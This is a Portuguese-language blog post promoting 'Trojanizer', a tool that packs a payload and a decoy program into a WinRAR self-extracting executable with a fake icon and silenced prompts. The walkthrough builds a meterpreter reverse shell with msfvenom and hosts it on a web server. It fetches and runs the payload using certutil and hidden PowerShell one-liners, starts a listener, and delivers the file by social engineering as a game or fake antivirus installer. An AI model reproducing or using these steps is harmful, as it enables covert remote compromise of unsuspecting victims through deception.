Browse By

Trojanizer – Para (WinRAR [SFX] Automatization)

A ferramenta Trojanizer usa o WinRAR (SFX) para compactar os dois arquivos inseridos pelo usuário e o transforma em um arquivo executável SFX (.exe). O arquivo sfx, quando executado, executará os dois arquivos (nossa carga útil e o aplicativo legítimo ao mesmo tempo).
Para tornar o arquivo menos suspeito para destino em tempo de execução, o trojanizer tentará substituir o ícone padrão (.ico) do arquivo sfx por um selecionado pelo usuário e suprimir todas as msgs da sandbox do arquivo SFX (Silent = 1 | Overwrite = 1 ).
O Trojanizer não cria trojans, mas da perspectiva do alvo, ele replica o comportamento do trojan ‘(executa o payload em background, enquanto o aplicativo legítimo é executado em primeiro plano).

DEPENDÊNCIAS (aplicações backend)

Zenity (bash-GUIs) | Vinho (x86 | x64) | WinRAr.exe (installed-in-wine)
“O Trojanizer.sh irá baixar / instalar todas as dependências conforme necessário”

É recomendado editar e configurar a opção: SYSTEM_ARCH = [your_sys_arch] no arquivo ‘settings’ antes de tentar executar a ferramenta pela primeira vez.

PAYLOADS (agentes) ACEITOS

.exe | .bat | .vbs | .ps1
“Todas as cargas úteis do Windows / SFX podem executar a extração automática”

DICA: Se for vendido ‘SINGLE_EXEC = ON’ no arquivo de configurações, o trojanizer aceitará qualquer tipo de extensão a ser inserida. 

APLICAÇÕES LEGIT ACCEPTED (decoys)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc.
“Todas as aplicações que o Windows / SFX pode executar automaticamente a extração”

DEFINIÇÕES AVANÇADAS

As ‘opções avançadas’ do Trojanizer são acessíveis apenas no arquivo ‘settings’, e elas só podem ser configuradas antes de executar a ferramenta principal (Trojanizer.sh)– Opção avançada de pré-configuraçãoO Trojanizer pode ser configurado para executar um programa + comando antes da extração / execução dos dois arquivos compactados (arquivo SFX). Isso permite que os usuários aproveitem o software pré-instalado para executar um comando remoto antes que a extração real ocorra no sistema de destino. Se ativo, o trojanizer perguntará (sandbox zenity) para que o comando seja executado

– single_file_execution
Vamos dar uma olhada no seguinte cenário: Você tem uma carga de dll para a entrada que precisa executar na extração, mas os arquivos sfx não podem executar diretamente os arquivos dll. Essa configuração permite que os usuários insiram um script em lote (.bat) usado para executar a carga útil da dll. Tudo o que o Trojanizer precisa fazer é instruir o arquivo SFX para extrair ambos os arquivos e executar o script.bat 

single_file_execution switch comportamento padrão para compactar os dois arquivos inseridos pelo usuário, mas somente executar um deles no momento da extração (o 2º arquivo inserido será executado) …
TROJANIZADOR E APLICAÇÃO DE BYPASSES WHITELISTING

Um monte de trabalho incrível foi feito por muitas pessoas, especialmente @subTee, sobre o bypass de whitelisting de aplicativos, que é o que queremos aqui: executar código arbitrário abusando de binários internos da Microsoft. Windows oneliners para baixar payload remoto e executar código arbitrário
O exercício a seguir descreve como usar as opções avançadas do trojanizer ‘single_file_execution’ e ‘Presetup’ para soltar (download remoto) e executar qualquer payload usando ‘certutil’ ou ‘powershell’ appl_whitelisting_bypass oneliners …1º – use o metasploit para construir nossa carga útil

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º – copie payload.exe para o apache2 webroot e inicie o serviço

cp payload.exe /var/www/html/payload.exe
service apache2 start

3º – edite o arquivo ‘configurações’ do Trojanizer e ative:

PRE_SETUP=ON
SINGLE_EXEC=ON

4º – ferramenta trojanizer em execução

PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

5º – inicie um ouvinte e envie o arquivo sfx para o alvo usando engenharia social

msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

Quando o arquivo sfx for executado, ele fará o download do payload.exe do nosso servidor apache2 para o destino e o executará antes de extrair ‘screenshot.png’ e ‘AngryBirds.exe’ (o último será executado para servir como isca) 

O seguinte usa o oneliner ‘powershell (Downloadfile + start)’ método para alcançar o mesmo que o anterior ‘certutil’ exercício ..

cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

O follow oneliner usa o método ‘powershell (IEX + downloadstring)’ para obter o mesmo resultado (payload.ps1 não toca no disco)

cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"

DOWNLOAD / INSTALAR

1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set files execution permitions
     cd trojanizer
     sudo chmod +x *.sh

3º - config framework
     nano settings

4º - Run main tool
     sudo ./Trojanizer.sh

Frameworks xsf.conf – executa ambos os arquivos na extração (comportamento do trojan)

xsf.conf – single_file_execution + Presetup (opções avançadas)

xsf.conf – single_file_execution + Presetup + appl_whitelisting_bypass (certutil)

xsf.conf – single_file_execution + Presetup + appl_whitelisting_bypass (IEX do powershell)

Arquivo sfx final com ícone alterado

Dentro do arquivo sfx (aberto com winrar) – comportamento trojan

Dentro do arquivo sfx (aberto com winrar) – single_file_execution

Trojanizer – instalador falso anti-vírus do AVG (comportamento trojan)

[sociallocker id=”1005″]

Download

[/sociallocker]

Deixe uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *

Este site utiliza o Akismet para reduzir spam. Fica a saber como são processados os dados dos comentários.